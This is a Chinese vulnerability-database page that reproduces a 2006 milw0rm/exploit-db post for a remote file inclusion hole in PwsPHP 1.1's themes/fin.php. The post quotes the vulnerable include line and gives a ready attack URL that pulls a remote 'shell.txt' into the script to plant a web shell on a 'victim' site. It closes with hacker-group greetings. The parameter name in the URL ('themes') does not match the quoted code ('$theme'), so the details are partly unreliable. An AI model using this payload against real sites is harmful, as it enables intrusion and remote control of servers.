PwsPHP 1.1 - '/themes/fin.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056024 漏洞类型
发布时间 2006-10-31 更新时间 2006-10-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/2693
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
==========================================================================================================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends
================================================================================================
http://www.comscripts.com/scripts/php.pwsphp.1517.html
================================================================================================

# milw0rm.com [2006-10-31]